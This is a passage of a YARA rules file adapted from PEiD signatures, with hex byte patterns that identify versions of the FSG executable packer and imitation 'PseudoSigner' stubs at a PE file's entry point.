00 00 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_bartxt_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80 A4 B6 80 FF D3 73 F9 33 C9 FF D3 73 16 33 C0 FF D3 73 23 B6 80 41 B0 10 FF D3 12 C0 73 FA 75 42 AA EB E0 E8 46 00 00 00 02 F6 83 D9 01 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 48 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B6 00 56 8B F7 2B F0 F3 A4 5E EB 97 33 C9 41 FF D3 13 C9 FF D3 72 F8 C3 02 D2 75 05 8A 16 46 12 D2 C3 5B 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 58 FF FF FF 5F BB ?? ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE 0F 75 06 47 FF 37 AF EB 09 FE 0F 0F 84 ?? ?? ?? FF 57 55 FF 53 04 89 06 AD 85 C0 75 D9 8B EC C3 ?? ?? ?? 00 00 00 00 00 00 00 00 00 88 01 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_MASM32_TASM32: PEiD\r\n{\r\n    strings:\r\n        $a = { 03 F7 23 FE 33 FB EB 02 CD 20 BB 80 ?? 40 00 EB 01 86 EB 01 90 B8 F4 00 00 00 83 EE 05 2B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_Microsoft_Visual_Cppx: PEiD\r\n{\r\n    strings:\r\n        $a = { 1B DB E8 02 00 00 00 1A 0D 5B 68 80 ?? ?? 00 E8 01 00 00 00 EA 5A 58 EB 02 CD 20 68 F4 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_120_Eng_dulekxt_MASM32_TASM32: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C2 2C FB 8D 3D 7E 45 B4 80 E8 02 00 00 00 8A 45 58 68 02 ?? 8C 7F EB 02 CD 20 5E 80 C9 16 03 F7 EB 02 40 B0 68 F4 00 00 00 80 F1 2C 5B C1 E9 05 0F B6 C9 8A 16 0F B6 C9 0F BF C7 2A D3 E8 02 00 00 00 99 4C 58 80 EA 53 C1 C9 16 2A D3 E8 02 00 00 00 9D CE }\r\n        $b = { 0F B6 D0 E8 01 00 00 00 0C 5A B8 80 ?? ?? 00 EB 02 00 DE 8D 35 F4 00 00 00 F7 D2 EB 02 0E EA 8B 38 EB 01 A0 C1 F3 11 81 EF 84 88 F4 4C EB 02 CD 20 83 F7 22 87 D3 33 FE C1 C3 19 83 F7 26 E8 02 00 00 00 BC DE 5A 81 EF F7 EF 6F 18 EB 02 CD 20 83 EF 7F EB 01 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v131_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 BB ?? ?? ?? ?? B2 80 A4 B6 80 FF D3 73 F9 33 C9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_4x_LCC_Win32_1x_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? 8E D8 B8 ?? ?? CD 21 A3 ?? ?? 3C 03 7D ?? B4 09 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v131_Eng_dulekxt_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BB ?? ?? BA ?? ?? 81 C3 07 00 B8 40 B4 B1 04 D3 E8 03 C3 8C D9 49 8E C1 26 03 0E 03 00 2B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? EB 02 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_02_FSG_131_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { BE 90 90 90 00 BF 90 90 90 00 BB 90 90 90 00 53 BB 90 90 90 00 B2 80 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_MASM32_TASM32_Microsoft_Visual_Basic_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { F7 D0 EB 02 CD 20 BE BB 74 1C FB EB 02 CD 20 BF 3B ?? ?? FB C1 C1 03 33 F7 EB 02 CD 20 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_131_dulekxt_: PEiD\r\n{\r\n    strings:\r\n        $a = { BE ?? ?? ?? 00 BF ?? ?? ?? 00 BB ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_20_bartxt: PEiD\r\n{\r\n    strings:\r\n        $a = { 87 25 ?? ?? ?? ?? 61 94 55 A4 B6 80 FF 13 73 F9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_: PEiD\r\n{\r\n    strings:\r\n        $a = { EB ?? ?? ?? ?? ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_110_Eng_bartxt_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_131_dulekxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BE ?? ?? ?? 00 BF ?? ?? ?? 00 BB ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80 }\r\n        $b = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80 A4 B6 80 FF D3 73 F9 33 C9 FF D3 73 16 33 C0 FF D3 73 23 B6 80 41 B0 10 FF D3 12 C0 73 FA 75 42 AA EB E0 E8 46 00 00 00 02 F6 83 D9 01 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 48 13 C9 EB }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_110_Eng_dulekxt_Borland_Delphi_Microsoft_Visual_Cpp: PEiD\r\n{\r\n    strings:\r\n        $a = { 2B C2 E8 02 00 00 00 95 4A 59 8D 3D 52 F1 2A E8 C1 C8 1C BE 2E ?? ?? 18 EB 02 AB A0 03 F7 EB 02 CD 20 68 F4 00 00 00 0B C7 5B 03 CB 8A 06 8A 16 E8 02 00 00 00 8D 46 59 EB 01 A4 02 D3 EB 02 CD 20 02 D3 E8 02 00 00 00 57 AB 58 81 C2 AA 87 AC B9 0F BE C9 80 }\r\n        $b = { 1B DB E8 02 00 00 00 1A 0D 5B 68 80 ?? ?? 00 E8 01 00 00 00 EA 5A 58 EB 02 CD 20 68 F4 00 00 00 EB 02 CD 20 5E 0F B6 D0 80 CA 5C 8B 38 EB 01 35 EB 02 DC 97 81 EF F7 65 17 43 E8 02 00 00 00 97 CB 5B 81 C7 B2 8B A1 0C 8B D1 83 EF 17 EB 02 0C 65 83 EF 43 13 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_Microsoft_Visual_Cpp_ASM_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 CD 20 EB 01 91 8D 35 80 ?? ?? 00 33 C2 68 83 93 7E 7D 0C A4 5B 23 C3 68 77 93 7E 7D EB 01 FA 5F E8 02 00 00 00 F7 FB 58 33 DF EB 01 3F E8 02 00 00 00 11 88 58 0F B6 16 EB 02 CD 20 EB 02 86 2F 2A D3 EB 02 CD 20 80 EA 2F EB 01 52 32 D3 80 E9 CD 80 EA 73 8B CF 81 C2 96 44 EB 04 EB 02 CD 20 88 16 E8 02 00 00 00 44 A2 59 46 E8 01 00 00 00 AD 59 4B 80 C1 13 83 FB 00 75 B2 F7 D9 96 8F 80 4D 0C 4C 91 50 1C 0C 50 8A ?? ?? ?? 50 E9 34 16 50 4C 4C 0E 7E 9B 49 C6 32 02 3E 7E 7B 5E 8C C5 6B 50 3F 0E 0F 38 C8 95 18 D1 65 11 2C B8 87 28 C3 4C 0B 3C AC D9 2D 15 4E 8F 1C 40 4F 28 98 3E 10 C1 45 DB 8F 06 3F EC 48 61 4C 50 50 81 DF C3 20 34 84 10 10 0C 1F 68 DC FF 24 8C 4D 29 F5 1D 2C BF 74 CF F0 24 C0 08 2E 0C 0C 10 51 0C 91 10 10 81 16 D0 54 4B D7 42 C3 54 CB C9 4E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_bartxt_Watcom_CCpp_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 CD 20 03 ?? 8D ?? 80 ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 02 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_100_Eng_dulekxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_MASM32_TASM32_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? EB ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v20_bartxt: PEiD\r\n{\r\n    strings:\r\n        $a = { 87 25 ?? ?? ?? 00 61 94 55 A4 B6 80 FF 13 }\r\n        $b = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 52 FF FF FF 5F BB ?? ?? ?? ?? 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE ?? 74 EF FE }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_V131Eng_dulekxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80 A4 B6 80 FF D3 73 F9 33 C9 FF D3 73 16 33 C0 FF D3 73 23 B6 80 41 B0 10 FF D3 12 C0 73 FA 75 42 AA EB E0 E8 46 00 00 00 02 F6 83 D9 01 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 48 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B6 00 56 8B F7 2B F0 F3 A4 5E EB 97 33 C9 41 FF D3 13 C9 FF D3 72 F8 C3 02 D2 75 05 8A 16 46 12 D2 C3 5B 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 58 FF FF FF 5F BB ?? ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE 0F 75 06 47 FF 37 AF EB 09 FE 0F 0F 84 ?? ?? ?? FF 57 55 FF 53 04 89 06 AD 85 C0 75 D9 8B EC C3 ?? ?? ?? 00 00 00 00 00 00 00 00 00 88 01 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v120_Eng_dulekxt_Microsoft_Visual_Cpp_60: PEiD\r\n{\r\n    strings:\r\n        $a = { C1 E0 06 EB 02 CD 20 EB 01 27 EB 01 24 BE 80 ?? 42 00 49 EB 01 99 8D 1D F4 00 00 00 EB 01 5C F7 D8 1B CA EB 01 31 8A 16 80 E9 41 EB 01 C2 C1 E0 0A EB 01 A1 81 EA A8 8C 18 A1 34 46 E8 01 00 00 00 62 59 32 D3 C1 C9 02 EB 01 68 80 F2 1A 0F BE C9 F7 D1 2A D3 }\r\n        $b = { C1 E0 06 EB 02 CD 20 EB 01 27 EB 01 24 BE 80 ?? 42 00 49 EB 01 99 8D 1D F4 00 00 00 EB 01 5C F7 D8 1B CA EB 01 31 8A 16 80 E9 41 EB 01 C2 C1 E0 0A EB 01 A1 81 EA A8 8C 18 A1 34 46 E8 01 00 00 00 62 59 32 D3 C1 C9 02 EB 01 68 80 F2 1A 0F BE C9 F7 D1 2A D3 EB 02 42 C0 EB 01 08 88 16 80 F1 98 80 C9 28 46 91 EB 02 C0 55 4B EB 01 55 34 44 0B DB 75 AD E8 01 00 00 00 9D 59 0B C6 EB 01 6C E9 D2 C3 82 C2 03 C2 B2 82 C2 00 ?? ?? 7C C2 6F DA BC C2 C2 C2 CC 1C 3D CF 4C D8 84 D0 0C FD F0 42 77 0D 66 F1 AC C1 DE CE 97 BA D7 EB C3 AE DE 91 AA D5 02 0D 1E EE 3F 23 77 C4 01 72 12 C1 0E 1E 14 82 37 AB 39 01 88 C9 DE CA 07 C2 C2 C2 17 79 49 B2 DA 0A C2 C2 C2 A9 EA 6E 91 AA 2E 03 CF 7B 9F CE 51 FA 6D A2 AA 56 8A E4 C2 C2 C2 07 C2 47 C2 C2 17 B8 42 C6 8D 31 88 45 BA 3D 2B BC }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_110_Eng_dulekxt_Borland_Delphi_Borland_Cpp_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 23 CA EB 02 5A 0D E8 02 00 00 00 6A 35 58 C1 C9 10 BE 80 ?? ?? 00 0F B6 C9 EB 02 CD 20 BB F4 00 00 00 EB 02 04 FA EB 01 FA EB 01 5F EB 02 CD 20 8A 16 EB 02 11 31 80 E9 31 EB 02 30 11 C1 E9 11 80 EA 04 EB 02 F0 EA 33 CB 81 EA AB AB 19 08 04 D5 03 C2 80 EA }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v20_bartxt_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 52 FF FF FF 5F BB ?? ?? ?? ?? 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE ?? 74 EF FE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_133_Eng_dulekxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF 13 73 1F B6 80 41 B0 10 FF 13 12 C0 73 FA 75 3C AA EB E0 FF 53 08 02 F6 83 D9 01 75 0E FF 53 04 EB 26 AC D1 E8 74 2F 13 C9 EB 1A 91 48 C1 E0 08 AC FF 53 04 3D 00 7D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_FSG_131_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { BE 90 90 90 00 BF 90 90 90 00 BB 90 90 90 00 53 BB 90 90 90 00 B2 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_13: PEiD\r\n{\r\n    strings:\r\n        $a = { BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF 13 73 1F B6 80 41 B0 10 FF 13 12 C0 73 FA 75 3C AA EB E0 FF 53 08 02 F6 83 D9 01 75 0E FF 53 04 EB 26 AC D1 E8 74 2F 13 C9 EB 1A 91 48 C1 E0 08 AC FF 53 04 3D 00 7D }\r\n        $b = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_Microsoft_Visual_Cpp_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 1E 0E 1F B8 ?? ?? 8E C0 26 8A 1E ?? ?? 80 ?? ?? 72 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_120_Eng_dulekxt_MASM32_TASM32_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 0F B6 D0 E8 01 00 00 00 0C 5A B8 80 ?? ?? 00 EB 02 00 DE 8D 35 F4 00 00 00 F7 D2 EB 02 0E EA 8B 38 EB 01 A0 C1 F3 11 81 EF 84 88 F4 4C EB 02 CD 20 83 F7 22 87 D3 33 FE C1 C3 19 83 F7 26 E8 02 00 00 00 BC DE 5A 81 EF F7 EF 6F 18 EB 02 CD 20 83 EF 7F EB 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v120_Eng_dulekxt_Borland_Cpp_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { C1 EE 00 66 8B C9 EB 01 EB 60 EB 01 EB 9C E8 00 00 00 00 5E 83 C6 ?? 8B FE 68 79 01 ?? ?? 59 EB 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_60_ASM_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 03 05 00 1B B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v100_Eng_dulekxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 }\r\n        $b = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 }\r\n        $c = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 51 FF FF FF 5F BB 28 ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE 0F 75 06 47 FF 37 AF EB 09 FE 0F 0F 84 ?? ?? ?? FF 57 55 FF 53 04 09 06 AD 75 DB 8B EC C3 1C ?? ?? 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PseudoSigner_02_FSG_131: PEiD\r\n{\r\n    strings:\r\n        $a = { BE 90 90 90 00 BF 90 90 90 00 BB 90 90 90 00 53 BB 90 90 90 00 B2 80 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_120_Eng_dulekxt_Borland_Delphi_Borland_Cpp: PEiD\r\n{\r\n    strings:\r\n        $a = { 0F BE C1 EB 01 0E 8D 35 C3 BE B6 22 F7 D1 68 43 ?? ?? 22 EB 02 B5 15 5F C1 F1 15 33 F7 80 E9 F9 BB F4 00 00 00 EB 02 8F D0 EB 02 08 AD 8A 16 2B C7 1B C7 80 C2 7A 41 80 EA 10 EB 01 3C 81 EA CF AE F1 AA EB 01 EC 81 EA BB C6 AB EE 2C E3 32 D3 0B CB 81 EA AB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Basic_MASM32: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 09 94 0F B7 FF 68 80 ?? ?? 00 81 F6 8E 00 00 00 5B EB 02 11 C2 8D 05 F4 00 00 00 47 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_01_FSG_131_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { BE 90 90 90 00 BF 90 90 90 00 BB 90 90 90 00 53 BB 90 90 90 00 B2 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_02_FSG_10_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 BB D0 01 40 00 BF 00 10 40 00 BE 90 90 90 90 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Cpp_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 52 FF FF FF 5F BB ?? ?? ?? ?? 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_02_FSG_10: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 BB D0 01 40 00 BF 00 10 40 00 BE 90 90 90 90 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_FSG_131: PEiD\r\n{\r\n    strings:\r\n        $a = { BE 90 90 90 00 BF 90 90 90 00 BB 90 90 90 00 53 BB 90 90 90 00 B2 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_60_70: PEiD\r\n{\r\n    strings:\r\n        $a = { 0B D0 8B DA E8 02 00 00 00 40 A0 5A EB 01 9D B8 80 ?? ?? 00 EB 02 CD 20 03 D3 8D 35 F4 00 00 00 EB 01 35 EB 01 88 80 CA 7C 80 F3 74 8B 38 EB 02 AC BA 03 DB E8 01 00 00 00 A5 5B C1 C2 0B 81 C7 DA 10 0A 4E EB 01 08 2B D1 83 EF 14 EB 02 CD 20 33 D3 83 EF 27 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_4x_LCC_Win32_1x: PEiD\r\n{\r\n    strings:\r\n        $a = { 2C 71 1B CA EB 01 2A EB 01 65 8D 35 80 ?? ?? 00 80 C9 84 80 C9 68 BB F4 00 00 00 EB 01 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_FSG_10: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 BB D0 01 40 00 BF 00 10 40 00 BE 90 90 90 90 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v20: PEiD\r\n{\r\n    strings:\r\n        $a = { 87 25 ?? ?? ?? ?? 61 94 55 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF 13 73 1F B6 80 41 B0 10 FF 13 12 C0 73 FA 75 }\r\n        $b = { 87 25 ?? ?? ?? 00 61 94 55 A4 B6 80 FF 13 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_110_Eng_dulekxt_MASM32_TASM32_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 1B DB E8 02 00 00 00 1A 0D 5B 68 80 ?? ?? 00 E8 01 00 00 00 EA 5A 58 EB 02 CD 20 68 F4 00 00 00 EB 02 CD 20 5E 0F B6 D0 80 CA 5C 8B 38 EB 01 35 EB 02 DC 97 81 EF F7 65 17 43 E8 02 00 00 00 97 CB 5B 81 C7 B2 8B A1 0C 8B D1 83 EF 17 EB 02 0C 65 83 EF 43 13 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v120_Eng_dulekxt_MASM32_TASM32: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C2 2C FB 8D 3D 7E 45 B4 80 E8 02 00 00 00 8A 45 58 68 02 ?? 